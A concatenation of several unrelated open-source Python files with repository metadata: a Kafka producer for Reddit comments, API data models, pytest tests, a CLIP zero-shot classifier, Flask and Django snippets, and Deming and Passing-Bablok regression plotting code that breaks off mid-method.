	call(["python3", "job_reset_scraper.py"])
def reset_sources():
	"""Run job_reset_sources.py as a blocking subprocess."""
	call(["python3", "job_reset_sources.py"])
# Run the four jobs concurrently; each thread just blocks on its subprocess.
# NOTE(review): the threads are never joined -- the main thread falls off the
# end and the non-daemon worker threads keep the process alive. Confirm this
# is the intended lifecycle.
process1 = threading.Thread(target=scraper)
process2 = threading.Thread(target=save_sources)
process3 = threading.Thread(target=reset_scraper)
process4 = threading.Thread(target=reset_sources)
process1.start()
process2.start()
process3.start()
process4.start()
| 22.448276 | 56 | 0.738863 |
c9359b5500958801527c3395149655f6f66f2d7a | 1,620 | py | Python | ingestion/producer1.py | aspk/ratsadtarget | e93cd3f71000ec409e79e6e0c873578f0e8fa8b3 | [
"Apache-2.0"
] | 1 | 2020-03-03T18:46:15.000Z | 2020-03-03T18:46:15.000Z | ingestion/producer1.py | Keyology/ratsadtarget | e93cd3f71000ec409e79e6e0c873578f0e8fa8b3 | [
"Apache-2.0"
] | null | null | null | ingestion/producer1.py | Keyology/ratsadtarget | e93cd3f71000ec409e79e6e0c873578f0e8fa8b3 | [
"Apache-2.0"
] | 1 | 2020-03-03T18:46:18.000Z | 2020-03-03T18:46:18.000Z | # producer to stream data into kafka
from boto.s3.connection import S3Connection
import datetime
import json
import bz2
from kafka import KafkaProducer
from kafka.errors import KafkaError
import time
import pytz
# --- One-off setup: S3 source, Kafka sink, bz2 decompression state ---
conn = S3Connection()
key = conn.get_bucket('aspk-reddit-posts').get_key('comments/RC_2017-11.bz2')
producer = KafkaProducer(bootstrap_servers=['10.0.0.5:9092'])
count = 0
decomp = bz2.BZ2Decompressor()
CHUNK_SIZE= 5000*1024
# NOTE(review): `timezone` is never used below -- confirm before removing.
timezone = pytz.timezone("America/Los_Angeles")
start_time = time.time()
# Stream the bz2 archive from S3 in ~5 MB chunks; decode each JSON comment
# line and forward a trimmed event to the Kafka topic.
while True:
    print('in')
    chunk = key.read(CHUNK_SIZE)
    if not chunk:
        break
    data = decomp.decompress(chunk).decode()
    for i in data.split('\n'):
        try:
            count+=1
            if count%10000==0 and count!=0:
                print('rate of kafka producer messages is {}'.format(count/(time.time()-start_time)))
            comment = json.loads(i)
            reddit_event = {}
            reddit_event['post'] = comment['permalink'].split('/')[-3]
            reddit_event['subreddit'] = comment['subreddit']
            reddit_event['timestamp'] = str(datetime.datetime.fromtimestamp(time.time()))
            reddit_event['body'] = comment['body']
            reddit_event['author'] = comment['author']
            producer.send('reddit-stream-topic', bytes(json.dumps(reddit_event),'utf-8'))
            # Flushing per message throttles throughput deliberately (see the
            # commented-out time.sleep alternatives below).
            producer.flush()
            # to reduce speed use time.sleep(0.01)
            #time.sleep(0.001)
        except:
            # NOTE(review): chunk boundaries do yield partial JSON lines, but
            # this bare except also swallows KeyboardInterrupt and real bugs;
            # `except (ValueError, KeyError)` would be safer.
            print('Incomplete string ... skipping this comment')
    #break
| 33.061224 | 105 | 0.608642 |
c9378ebb2e19a75b65829de15453b31293aca652 | 3,060 | py | Python | src/odin-http/odin/http/models.py | wenshuoliu/odin | 7998ee7541b3de44dd149899168983e964f2b8f7 | [
"Apache-2.0"
] | 4 | 2020-12-15T15:57:14.000Z | 2020-12-16T21:52:23.000Z | src/odin-http/odin/http/models.py | wenshuoliu/odin | 7998ee7541b3de44dd149899168983e964f2b8f7 | [
"Apache-2.0"
] | 2 | 2021-03-15T02:49:56.000Z | 2021-03-27T12:42:38.000Z | src/odin-http/odin/http/models.py | wenshuoliu/odin | 7998ee7541b3de44dd149899168983e964f2b8f7 | [
"Apache-2.0"
] | 5 | 2020-12-15T19:09:00.000Z | 2021-04-21T20:40:38.000Z | #from pydantic import BaseModel as Model
# This gives us backwards compatible API calls
from fastapi_camelcase import CamelModel as Model
from typing import Optional, List
from datetime import date, datetime
class UserDefinition(Model):
username: str
password: Optional[str] = None
firstname: Optional[str] = None
lastname: Optional[str] = None
class UserWrapperDefinition(Model):
user: UserDefinition
class UserResults(Model):
users: List[UserDefinition]
class EventDefinition(Model):
id: str
event_type: str
reason: Optional[str] = None
source: Optional[str] = None
message: Optional[str] = None
timestamp: Optional[datetime] = None
class KeyValueDefinition(Model):
key: str
value: str
class VolumeMountDefinition(Model):
path: str
name: str
claim: str
class EventResults(Model):
events: List[EventDefinition]
class TaskDefinition(Model):
    """Declarative spec of a single task inside a job definition."""
    id: str
    name: str
    image: str  # container image the task runs in
    command: str
    args: List[str] = []  # NOTE(review): mutable [] defaults assume the model base copies them per instance -- confirm
    mounts: List[VolumeMountDefinition] = []
    num_gpus: Optional[int]
    pull_policy: str
    node_selector: List[KeyValueDefinition] = []
    resource_type: str
    num_workers: Optional[int]
    depends: List[str] = []  # presumably ids/names of tasks that must finish first -- confirm
    inputs: List[str] = []
    outputs: List[str] = []
class TaskStatusDefinition(Model):
id: str
task: str
name: str
status: str
command: str
image: str
resource_type: str
resource_id: str
submit_time: Optional[datetime]
completion_time: Optional[datetime]
events: List[EventDefinition] = []
class PipelineDefinition(Model):
    """Identity and runtime status of one pipeline run."""
    id: Optional[str]
    job: str
    version: Optional[str]
    tasks: List[TaskStatusDefinition] = []  # per-task statuses of this run
    name: Optional[str]
    status: Optional[str]
    message: Optional[str]
    submit_time: Optional[datetime] = None
    completion_time: Optional[datetime] = None
class PipelineWrapperDefinition(Model):
    """Envelope pairing a pipeline with its context mapping."""
    pipeline: Optional[PipelineDefinition] = None
    # BUG FIX: the default was the *list* [] on a dict-typed field; use an
    # empty dict so the default matches the annotation.
    context: dict = {}
class PipelineResults(Model):
pipelines: List[PipelineDefinition] = []
class PipelineCleanupDefinition(Model):
task_id: str
cleaned_from_k8s: Optional[bool] = True
purged_from_db: Optional[bool] = False
removed_from_fs: Optional[bool] = False
class PipelineCleanupResults(Model):
cleanups: List[PipelineCleanupDefinition] = []
class ConfigDefinition(Model):
id: str
name: str
content: str
class JobDefinition(Model):
id: Optional[str] = None
name: str
location: Optional[str] = None
creation_time: Optional[datetime]
tasks: List[TaskDefinition] = []
configs: List[ConfigDefinition] = []
class JobWrapperDefinition(Model):
job: Optional[JobDefinition] = None
class JobResults(Model):
jobs: List[JobDefinition] = []
class UploadDefinition(Model):
bytes: int
location: str
class AuthResponseDefinition(Model):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
message: Optional[str] = None
| 21.103448 | 80 | 0.693137 |
c9380c3f618a01051fb6b644e3bcd12fce9edfdc | 7,931 | py | Python | tests/test_data/test_data_core.py | shaoeric/hyperparameter_hunter | 3709d5e97dd23efa0df1b79982ae029789e1af57 | [
"MIT"
] | 688 | 2018-06-01T23:43:28.000Z | 2022-03-23T06:37:20.000Z | tests/test_data/test_data_core.py | shaoeric/hyperparameter_hunter | 3709d5e97dd23efa0df1b79982ae029789e1af57 | [
"MIT"
] | 188 | 2018-07-09T23:22:31.000Z | 2021-04-01T07:43:46.000Z | tests/test_data/test_data_core.py | shaoeric/hyperparameter_hunter | 3709d5e97dd23efa0df1b79982ae029789e1af57 | [
"MIT"
] | 100 | 2018-08-28T03:30:47.000Z | 2022-01-25T04:37:11.000Z | ##################################################
# Import Own Assets
##################################################
from hyperparameter_hunter.data.data_core import BaseDataChunk, BaseDataset, NullDataChunk
##################################################
# Import Miscellaneous Assets
##################################################
import pandas as pd
import pytest
from unittest import mock
##################################################
# White-Box/Structural Test Fixtures
##################################################
@pytest.fixture(scope="module")
def null_chunk_fixture():
    """Module-scoped fixture yielding one shared :class:`data.data_core.NullDataChunk` instance."""
    return NullDataChunk()
@pytest.fixture(scope="module")
def base_dataset_fixture():
    """Module-scoped fixture yielding a bare :class:`data.data_core.BaseDataset` (both ctor args None)."""
    return BaseDataset(None, None)
##################################################
# White-Box/Structural Tests
##################################################
@mock.patch("hyperparameter_hunter.data.data_core.NullDataChunk._on_call_default")
@pytest.mark.parametrize("point", ["start", "end"])
@pytest.mark.parametrize("division", ["exp", "rep", "fold", "run"])
def test_callback_method_invocation(mock_on_call_default, point, division, null_chunk_fixture):
"""Test that calling any primary callback methods of :class:`data.data_core.NullDataChunk`
results in a call to :meth:`data.data_core.BaseDataCore._on_call_default` with the appropriate
`division` and `point` arguments. Using `on_fold_end` as an example, this function ensures::
`on_fold_end(...)` call -> `_on_call_default("fold", "end", ...)` call"""
null_chunk_fixture.__getattribute__(f"on_{division}_{point}")("An arg", k="A kwarg")
mock_on_call_default.assert_called_once_with(division, point, "An arg", k="A kwarg")
@pytest.mark.parametrize("point", ["start", "end"])
@pytest.mark.parametrize("division", ["exp", "rep", "fold", "run"])
def test_do_something_invocation(point, division, null_chunk_fixture):
"""Test that calling :meth:`data.data_core.NullDataChunk._do_something` results in the invocation
of the proper primary callback method as specified by `division` and `point`. Using
`on_fold_end` as an example, this function ensures::
`_do_something("fold", "end", ...)` call -> `on_fold_end(...)` call"""
method_to_mock = f"on_{division}_{point}"
mock_method_path = f"hyperparameter_hunter.data.data_core.NullDataChunk.{method_to_mock}"
with mock.patch(mock_method_path) as mock_primary_callback:
null_chunk_fixture._do_something(division, point, "An arg", k="A kwarg")
mock_primary_callback.assert_called_once_with("An arg", k="A kwarg")
@pytest.mark.parametrize("point", ["start", "end"])
@pytest.mark.parametrize("division", ["exp", "rep", "fold", "run"])
def test_kind_chunk_invocation(point, division, base_dataset_fixture):
"""Test that calling :meth:`data.data_core.BaseDataset._do_something` results in the invocation
of the proper callback method of :class:`data.data_core.BaseDataChunk` three times (once for
`input`, `target` and `prediction`). Using `on_fold_end` as an example, this function ensures::
`_do_something("fold", "end", ...)` `BaseDataset` call ->
`on_fold_end(...)` call (`input` chunk)
`on_fold_end(...)` call (`target` chunk)
`on_fold_end(...)` call (`prediction` chunk)"""
method_to_mock = f"on_{division}_{point}"
mock_method_path = f"hyperparameter_hunter.data.data_core.BaseDataChunk.{method_to_mock}"
with mock.patch(mock_method_path) as mock_primary_callback:
base_dataset_fixture._do_something(division, point, "An arg", k="A kwarg")
mock_primary_callback.assert_has_calls([mock.call("An arg", k="A kwarg")] * 3)
##################################################
# `BaseDataChunk` Equality
##################################################
def _update_data_chunk(updates: dict):
    """Build a `BaseDataChunk` and set the given attributes on it.

    Keys prefixed with ``"T."`` are set on the chunk's ``T`` member (the
    transformed view); all other keys are set on the chunk itself.
    """
    chunk = BaseDataChunk(None)
    for name, content in updates.items():
        target, attr = (chunk.T, name[2:]) if name.startswith("T.") else (chunk, name)
        setattr(target, attr, content)
    return chunk
@pytest.fixture()
def data_chunk_fixture(request):
return _update_data_chunk(getattr(request, "param", dict()))
@pytest.fixture()
def another_data_chunk_fixture(request):
return _update_data_chunk(getattr(request, "param", dict()))
#################### Test Scenario Data ####################
df_0 = pd.DataFrame(dict(a=[1, 2, 3], b=[4, 5, 6]))
df_1 = pd.DataFrame(dict(a=[1, 2, 3], b=[999, 5, 6]))
df_2 = pd.DataFrame(dict(a=[1, 2, 3], b=[4, 5, 6]), index=["foo", "bar", "baz"])
df_3 = pd.DataFrame(dict(a=[1, 2, 3], c=[4, 5, 6]), index=["foo", "bar", "baz"])
df_4 = pd.DataFrame(dict(a=[1, 2, 3], b=[4, 5, 6], c=[7, 8, 9]))
chunk_data_0 = dict(d=pd.DataFrame())
chunk_data_1 = dict(d=pd.DataFrame(), fold=df_0)
chunk_data_2 = dict(d=pd.DataFrame(), fold=df_1)
chunk_data_3 = dict(d=pd.DataFrame(), fold=df_2)
chunk_data_4 = {"d": pd.DataFrame(), "fold": df_2, "T.fold": df_3}
chunk_data_5 = {"d": pd.DataFrame(), "fold": df_3, "T.fold": df_2}
chunk_data_6 = {"d": pd.DataFrame(), "fold": df_3, "T.fold": df_2, "T.d": df_4}
@pytest.mark.parametrize(
["data_chunk_fixture", "another_data_chunk_fixture"],
[
[dict(), dict()],
[chunk_data_0, chunk_data_0],
[chunk_data_1, chunk_data_1],
[chunk_data_2, chunk_data_2],
[chunk_data_3, chunk_data_3],
[chunk_data_4, chunk_data_4],
[chunk_data_5, chunk_data_5],
[chunk_data_6, chunk_data_6],
],
indirect=True,
)
def test_data_chunk_equality(data_chunk_fixture, another_data_chunk_fixture):
assert data_chunk_fixture == another_data_chunk_fixture
#################### Inequality Tests ####################
@pytest.mark.parametrize(
"data_chunk_fixture",
[chunk_data_1, chunk_data_2, chunk_data_3, chunk_data_4, chunk_data_5, chunk_data_6],
indirect=True,
)
def test_data_chunk_inequality_0(data_chunk_fixture):
assert _update_data_chunk(chunk_data_0) != data_chunk_fixture
@pytest.mark.parametrize(
"data_chunk_fixture",
[chunk_data_0, chunk_data_2, chunk_data_3, chunk_data_4, chunk_data_5, chunk_data_6],
indirect=True,
)
def test_data_chunk_inequality_1(data_chunk_fixture):
assert _update_data_chunk(chunk_data_1) != data_chunk_fixture
@pytest.mark.parametrize(
"data_chunk_fixture",
[chunk_data_0, chunk_data_1, chunk_data_3, chunk_data_4, chunk_data_5, chunk_data_6],
indirect=True,
)
def test_data_chunk_inequality_2(data_chunk_fixture):
assert _update_data_chunk(chunk_data_2) != data_chunk_fixture
@pytest.mark.parametrize(
"data_chunk_fixture",
[chunk_data_0, chunk_data_1, chunk_data_2, chunk_data_4, chunk_data_5, chunk_data_6],
indirect=True,
)
def test_data_chunk_inequality_3(data_chunk_fixture):
assert _update_data_chunk(chunk_data_3) != data_chunk_fixture
@pytest.mark.parametrize(
"data_chunk_fixture",
[chunk_data_0, chunk_data_1, chunk_data_2, chunk_data_3, chunk_data_5, chunk_data_6],
indirect=True,
)
def test_data_chunk_inequality_4(data_chunk_fixture):
assert _update_data_chunk(chunk_data_4) != data_chunk_fixture
@pytest.mark.parametrize(
"data_chunk_fixture",
[chunk_data_0, chunk_data_1, chunk_data_2, chunk_data_3, chunk_data_4, chunk_data_6],
indirect=True,
)
def test_data_chunk_inequality_5(data_chunk_fixture):
assert _update_data_chunk(chunk_data_5) != data_chunk_fixture
@pytest.mark.parametrize(
"data_chunk_fixture",
[chunk_data_0, chunk_data_1, chunk_data_2, chunk_data_3, chunk_data_4, chunk_data_5],
indirect=True,
)
def test_data_chunk_inequality_6(data_chunk_fixture):
assert _update_data_chunk(chunk_data_6) != data_chunk_fixture
| 40.258883 | 102 | 0.667381 |
c939aef00a062e0b98f7c418e70663b8692f035d | 108 | py | Python | sample/sample.py | eaybek/getthat | 3ca34902f773ec6a40a1df0b7dac5845a22cc8e4 | [
"MIT"
] | null | null | null | sample/sample.py | eaybek/getthat | 3ca34902f773ec6a40a1df0b7dac5845a22cc8e4 | [
"MIT"
] | null | null | null | sample/sample.py | eaybek/getthat | 3ca34902f773ec6a40a1df0b7dac5845a22cc8e4 | [
"MIT"
] | null | null | null | from getthat import getthat
# from sna.search import Sna
# Dynamic form of the commented-out import above: resolve the name "Sna"
# from module "sna.search" through `getthat`, then build an instance.
Sna = getthat("sna.search", "Sna")
sna = Sna()
| 12 | 34 | 0.685185 |
c93c9aaedb099246f931a93b0f3660c7f68b5819 | 2,481 | py | Python | src/models/zeroshot.py | mmatena/wise-ft | 2630c366d252ad32db82ea886f7ab6a752142792 | [
"MIT"
] | 79 | 2021-10-01T22:29:51.000Z | 2022-03-30T04:19:58.000Z | src/models/zeroshot.py | mmatena/wise-ft | 2630c366d252ad32db82ea886f7ab6a752142792 | [
"MIT"
] | 2 | 2021-11-18T19:50:59.000Z | 2022-01-08T00:57:24.000Z | src/models/zeroshot.py | mmatena/wise-ft | 2630c366d252ad32db82ea886f7ab6a752142792 | [
"MIT"
] | 10 | 2021-10-14T18:29:59.000Z | 2022-03-27T12:40:18.000Z | import os
import torch
from tqdm import tqdm
import numpy as np
import clip.clip as clip
import src.templates as templates
import src.datasets as datasets
from src.args import parse_arguments
from src.models.modeling import ClassificationHead, ImageEncoder, ImageClassifier
from src.models.eval import evaluate
def get_zeroshot_classifier(args, clip_model):
    """Build a zero-shot classification head from CLIP text embeddings.

    For every class name of the training dataset, each prompt template is
    filled in, tokenized and embedded with the CLIP text encoder (under
    ``no_grad``); the per-template embeddings are L2-normalized, averaged,
    re-normalized and scaled by the model's logit scale.

    Args:
        args: parsed CLI arguments; must provide ``template`` and
            ``train_dataset`` (asserted below) plus data/device settings.
        clip_model: CLIP model exposing ``encode_text`` and ``logit_scale``.

    Returns:
        ClassificationHead: head initialized with the zero-shot weights.
    """
    assert args.template is not None
    assert args.train_dataset is not None
    template = getattr(templates, args.template)
    logit_scale = clip_model.logit_scale
    # The dataset is only consulted for its class names here.
    dataset_class = getattr(datasets, args.train_dataset)
    dataset = dataset_class(
        None,
        location=args.data_location,
        batch_size=args.batch_size,
        classnames=args.classnames
    )
    device = args.device
    clip_model.eval()
    clip_model.to(device)
    print('Getting zeroshot weights.')
    with torch.no_grad():
        zeroshot_weights = []
        for classname in tqdm(dataset.classnames):
            texts = []
            for t in template:
                texts.append(t(classname))
            texts = clip.tokenize(texts).to(device) # tokenize
            embeddings = clip_model.encode_text(texts) # embed with text encoder
            embeddings /= embeddings.norm(dim=-1, keepdim=True)
            # Average the per-template embeddings into one class vector.
            embeddings = embeddings.mean(dim=0, keepdim=True)
            embeddings /= embeddings.norm()
            zeroshot_weights.append(embeddings)
        zeroshot_weights = torch.stack(zeroshot_weights, dim=0).to(device)
        zeroshot_weights = torch.transpose(zeroshot_weights, 0, 2)
        zeroshot_weights *= logit_scale.exp()
        # The squeeze/transpose pair rearranges the stacked embeddings into
        # the layout ClassificationHead expects -- assumes a singleton middle
        # dim from keepdim=True above; confirm against ClassificationHead.
        zeroshot_weights = zeroshot_weights.squeeze().float()
        zeroshot_weights = torch.transpose(zeroshot_weights, 0, 1)
    classification_head = ClassificationHead(normalize=True, weights=zeroshot_weights)
    return classification_head
def eval(args):
    """Evaluate either a saved classifier or a freshly built zero-shot one."""
    # NOTE(review): this function shadows the builtin `eval`; renaming would
    # change the entry point called below, so it is only flagged here.
    args.freeze_encoder = True
    if args.load is not None:
        classifier = ImageClassifier.load(args.load)
    else:
        image_encoder = ImageEncoder(args, keep_lang=True)
        classification_head = get_zeroshot_classifier(args, image_encoder.model)
        # The text transformer was only needed to build the head; drop it
        # before evaluation -- presumably to free memory.
        delattr(image_encoder.model, 'transformer')
        classifier = ImageClassifier(image_encoder, classification_head, process_images=False)
    evaluate(classifier, args)
    if args.save is not None:
        classifier.save(args.save)
if __name__ == '__main__':
    # CLI entry point: parse arguments and run the evaluation flow.
    args = parse_arguments()
    eval(args)
c93cab934e2e3f25cd7169e11400beb6e6d43570 | 425 | py | Python | app/main/__init__.py | csmcallister/beular | 219bcd552c1303eb0557f3ef56d44355a932399e | [
"CNRI-Python"
] | null | null | null | app/main/__init__.py | csmcallister/beular | 219bcd552c1303eb0557f3ef56d44355a932399e | [
"CNRI-Python"
] | null | null | null | app/main/__init__.py | csmcallister/beular | 219bcd552c1303eb0557f3ef56d44355a932399e | [
"CNRI-Python"
] | null | null | null | from flask import Blueprint
bp = Blueprint('main', __name__)
@bp.after_app_request
def after_request(response):
"""Cache Bust
"""
cache_cont = "no-cache, no-store, must-revalidate, public, max-age=0"
response.headers["Cache-Control"] = cache_cont
response.headers["Expires"] = 0
response.headers["Pragma"] = "no-cache"
return response
from app.main import routes # noqa: F401 | 25 | 74 | 0.665882 |
c94067f14edbfaeef67d40e03949c3cc7bd61802 | 734 | py | Python | blog/models.py | sd5682295/course_demo-master-2fe2955bdcb6985c2b48bb3487da5732c395bbc2 | face6e8d4e6cc61c3ef437142b71639393de3bf8 | [
"MIT"
] | null | null | null | blog/models.py | sd5682295/course_demo-master-2fe2955bdcb6985c2b48bb3487da5732c395bbc2 | face6e8d4e6cc61c3ef437142b71639393de3bf8 | [
"MIT"
] | null | null | null | blog/models.py | sd5682295/course_demo-master-2fe2955bdcb6985c2b48bb3487da5732c395bbc2 | face6e8d4e6cc61c3ef437142b71639393de3bf8 | [
"MIT"
] | null | null | null | from django.db import models
from django.contrib.auth.models import User
class Category(models.Model):
name = models.CharField(max_length=100)
def __str__(self):
return self.name
class Tag(models.Model):
name = models.CharField(max_length=100)
def __str__(self):
return self.name
class Post(models.Model):
title = models.CharField(max_length=80)
subtitle = models.CharField(max_length=80)
publish_date = models.DateTimeField()
content = models.TextField()
link = models.CharField(max_length=100)
author = models.ForeignKey(User, on_delete=models.CASCADE)
category = models.ForeignKey(Category, on_delete=models.CASCADE)
tag = models.ManyToManyField(Tag, blank=True)
def __str__(self):
return self.title
| 22.9375 | 65 | 0.76703 |
c94170821cd5e437201c56213668e61ba65bc8e5 | 21,018 | py | Python | methcomp/regression.py | daneishdespot/methcomp | 767d85aa56a8fda372847585decca8879ec2ac98 | [
"MIT"
] | null | null | null | methcomp/regression.py | daneishdespot/methcomp | 767d85aa56a8fda372847585decca8879ec2ac98 | [
"MIT"
] | null | null | null | methcomp/regression.py | daneishdespot/methcomp | 767d85aa56a8fda372847585decca8879ec2ac98 | [
"MIT"
] | null | null | null | import matplotlib.pyplot as plt
import pandas as pd
import scipy.stats as st
import statsmodels.api as sm
import math
import numpy as np
__all__ = ["deming", "passingbablok", "linear"]
class _Deming(object):
"""Internal class for drawing a Deming regression plot"""
def __init__(self, method1, method2,
vr, sdr, bootstrap,
x_label, y_label, title,
CI, line_reference, line_CI, legend,
color_points, color_deming,
point_kws):
self.method1: np.array = np.asarray(method1)
self.method2: np.array = np.asarray(method2)
self.vr = vr
self.sdr = sdr
self.bootstrap = bootstrap
self.x_title = x_label
self.y_title = y_label
self.graph_title = title
self.color_points = color_points
self.color_deming = color_deming
self.CI = CI
self.line_reference = line_reference
self.line_CI = line_CI
self.legend = legend
self.point_kws = {} if point_kws is None else point_kws.copy()
self._check_params()
self._derive_params()
def _check_params(self):
if len(self.method1) != len(self.method2):
raise ValueError('Length of method 1 and method 2 are not equal.')
if self.bootstrap is not None and not isinstance(self.bootstrap, int):
raise ValueError('Bootstrap argument should either be None or an integer.')
if self.CI is not None and (self.CI > 1 or self.CI < 0):
raise ValueError('Confidence interval must be between 0 and 1.')
if any([not isinstance(x, str) for x in [self.x_title, self.y_title]]):
raise ValueError('Axes labels arguments should be provided as a str.')
def _derive_params(self):
def _deming(x, y, lamb):
ssdx = np.var(x, ddof=1) * (self.n - 1)
ssdy = np.var(y, ddof=1) * (self.n - 1)
spdxy = np.cov(x, y)[1][1] * (self.n - 1)
beta = (ssdy - lamb * ssdx + math.sqrt((ssdy - lamb * ssdx) ** 2 + 4 * lamb * (ssdy ** 2))) / (
2 * spdxy)
alpha = y.mean() - beta * x.mean()
ksi = (lamb * x + beta * (y - alpha)) / (lamb + beta ** 2)
sigmax = lamb * sum((x - ksi) ** 2) + sum((y - alpha - beta * ksi) ** 2) / (
(self.n - 2) * beta)
sigmay = math.sqrt(lamb * sigmax)
sigmax = math.sqrt(sigmax)
return alpha, beta, sigmax, sigmay
self.n = len(self.method1)
if self.vr is not None:
_lambda = self.vr
elif self.sdr is not None:
_lambda = self.sdr
else:
_lambda = 1
params = _deming(self.method1, self.method2, _lambda)
if self.bootstrap is None:
self.alpha = params[0]
self.beta = params[1]
self.sigmax = params[2]
self.sigmay = params[3]
else:
_params = np.zeros([self.bootstrap, 4])
for i in range(self.bootstrap):
idx = np.random.choice(range(self.n), self.n, replace=True)
_params[i] = _deming(np.take(self.method1, idx), np.take(self.method2, idx), _lambda)
_paramsdf = pd.DataFrame(_params, columns=['alpha', 'beta', 'sigmax', 'sigmay'])
se = np.sqrt(np.diag(np.cov(_paramsdf.cov())))
t = np.transpose(
np.apply_along_axis(np.quantile, 0, _params, [0.5, (1 - self.CI) / 2, 1 - (1 - self.CI) / 2]))
self.alpha = [t[0][0], se[0], t[0][1], t[0][2]]
self.beta = [t[1][0], se[1], t[0][1], t[0][2]]
self.sigmax = [t[2][0], se[2], t[0][1], t[0][2]]
self.sigmay = [t[3][0], se[3], t[0][1], t[0][2]]
def plot(self, ax):
# plot individual points
ax.scatter(self.method1, self.method2, s=20, alpha=0.6, color=self.color_points)
# plot reference line
if self.line_reference:
ax.plot([0, 1], [0, 1], label='Reference',
color='grey', linestyle='--', transform=ax.transAxes)
# plot Deming-line
_xvals = np.array(ax.get_xlim())
if self.bootstrap is None:
_yvals = self.alpha + self.beta * _xvals
ax.plot(_xvals, _yvals, label=f'{self.alpha:.2f} + {self.beta:.2f} * Method 1',
color=self.color_deming, linestyle='-')
else:
_yvals = [self.alpha[s] + self.beta[0] * _xvals for s in range(0, 4)]
ax.plot(_xvals, _yvals[0], label=f'{self.alpha[0]:.2f} + {self.beta[0]:.2f} * Method 1',
color=self.color_deming, linestyle='-')
ax.fill_between(_xvals, _yvals[2], _yvals[3], color=self.color_deming, alpha=0.2)
if self.line_CI:
ax.plot(_xvals, _yvals[2], linestyle='--')
ax.plot(_xvals, _yvals[3], linestyle='--')
if self.legend:
ax.legend(loc='upper left', frameon=False)
ax.set_ylabel(self.y_title)
ax.set_xlabel(self.x_title)
if self.graph_title is not None:
ax.set_title(self.graph_title)
def deming(method1, method2,
vr=None, sdr=None, bootstrap=1000,
x_label='Method 1', y_label='Method 2', title=None,
CI=0.95, line_reference=True, line_CI=False, legend=True,
color_points='#000000', color_deming='#008bff',
point_kws=None,
square=False, ax=None):
"""Provide a method comparison using Deming regression.
This is an Axis-level function which will draw the Deming plot
onto the current active Axis object unless ``ax`` is provided.
Parameters
----------
method1, method2 : array, or list
Values obtained from both methods, preferably provided in a np.array.
vr : float
The assumed known ratio of the (residual) variance of the ys relative to that of the xs.
Defaults to 1.
sdr : float
The assumed known standard deviations. Parameter vr takes precedence if both are given.
Defaults to 1.
bootstrap : int or None
Amount of bootstrap estimates that should be performed to acquire standard errors (and confidence
intervals). If None, no bootstrapping is performed. Defaults to 1000.
x_label : str, optional
The label which is added to the X-axis. If None is provided, a standard
label will be added.
y_label : str, optional
The label which is added to the Y-axis. If None is provided, a standard
label will be added.
title : str, optional
Title of the plot. If None is provided, no title will be plotted.
CI : float, optional
The confidence interval employed in Deming line. Defaults to 0.95.
line_reference : bool, optional
If True, a grey reference line at y=x will be plotted in the plot.
Defaults to true.
line_CI : bool, optional
If True, dashed lines will be plotted at the boundaries of the confidence intervals.
Defaults to false.
legend : bool, optional
If True, will provide a legend containing the computed Deming equation.
Defaults to true.
color_points : str, optional
Color of the individual differences that will be plotted.
Color should be provided in format compatible with matplotlib.
color_deming : str, optional
Color of the mean difference line that will be plotted.
Color should be provided in format compatible with matplotlib.
square : bool, optional
If True, set the Axes aspect to "equal" so each cell will be
square-shaped.
point_kws : dict of key, value mappings, optional
Additional keyword arguments for `plt.scatter`.
ax : matplotlib Axes, optional
Axes in which to draw the plot, otherwise use the currently-active
Axes.
Returns
-------
ax : matplotlib Axes
Axes object with the Deming plot.
See Also
-------
Koopmans, T. C. (1937). Linear regression analysis of economic time series. DeErven F. Bohn, Haarlem, Netherlands.
Deming, W. E. (1943). Statistical adjustment of data. Wiley, NY (Dover Publications edition, 1985).
"""
plotter: _Deming = _Deming(method1, method2,
vr, sdr, bootstrap,
x_label, y_label, title,
CI, line_reference, line_CI, legend,
color_points, color_deming,
point_kws)
# Draw the plot and return the Axes
if ax is None:
ax = plt.gca()
if square:
ax.set_aspect('equal')
plotter.plot(ax)
return ax
class _PassingBablok(object):
"""Internal class for drawing a Passing-Bablok regression plot"""
def __init__(self, method1, method2,
x_label, y_label, title,
CI, line_reference, line_CI, legend,
color_points, color_paba,
point_kws):
self.method1: np.array = np.asarray(method1)
self.method2: np.array = np.asarray(method2)
self.x_title = x_label
self.y_title = y_label
self.graph_title = title
self.CI = CI
self.color_points = color_points
self.color_paba = color_paba
self.line_reference = line_reference
self.line_CI = line_CI
self.legend = legend
self.point_kws = {} if point_kws is None else point_kws.copy()
self._check_params()
self._derive_params()
def _check_params(self):
if len(self.method1) != len(self.method2):
raise ValueError('Length of method 1 and method 2 are not equal.')
if self.CI is not None and (self.CI > 1 or self.CI < 0):
raise ValueError('Confidence interval must be between 0 and 1.')
if any([not isinstance(x, str) for x in [self.x_title, self.y_title]]):
raise ValueError('Axes labels arguments should be provided as a str.')
def _derive_params(self):
self.n = len(self.method1)
self.sv = []
for i in range(self.n - 1):
for j in range(i + 1, self.n):
self.sv.append((self.method2[i] - self.method2[j]) /
(self.method1[i] - self.method1[j]))
self.sv.sort()
n = len(self.sv)
k = math.floor(len([a for a in self.sv if a < 0]) / 2)
if n % 2 == 1:
self.slope = self.sv[int((n + 1) / k + 2)]
else:
self.slope = math.sqrt(self.sv[int(n / 2 + k)] * self.sv[int(n / 2 + k + 1)])
_ci = st.norm.ppf(1 - (1 - self.CI) / 2) * math.sqrt((self.n * (self.n - 1) * (2 * self.n + 5)) / 18)
_m1 = int(round((n - _ci) / 2))
_m2 = n - _m1 - 1
self.slope = [self.slope, self.sv[k + _m1], self.sv[k + _m2]]
self.intercept = [np.median(self.method2 - self.slope[0] * self.method1),
np.median(self.method2 - self.slope[1] * self.method1),
np.median(self.method2 - self.slope[2] * self.method1)]
def plot(self, ax):
# plot individual points
ax.scatter(self.method1, self.method2, s=20, alpha=0.6, color=self.color_points,
**self.point_kws)
# plot reference line
if self.line_reference:
ax.plot([0, 1], [0, 1], label='Reference',
color='grey', linestyle='--', transform=ax.transAxes)
# plot PaBa-line
_xvals = np.array(ax.get_xlim())
_yvals = [self.intercept[s] + self.slope[s] * _xvals for s in range(0, 3)]
ax.plot(_xvals, _yvals[0], label=f'{self.intercept[0]:.2f} + {self.slope[0]:.2f} * Method 1',
color=self.color_paba, linestyle='-')
ax.fill_between(_xvals, _yvals[1], _yvals[2], color=self.color_paba, alpha=0.2)
if self.line_CI:
ax.plot(_xvals, _yvals[1], linestyle='--')
ax.plot(_xvals, _yvals[2], linestyle='--')
if self.legend:
ax.legend(loc='upper left', frameon=False)
ax.set_ylabel(self.y_title)
ax.set_xlabel(self.x_title)
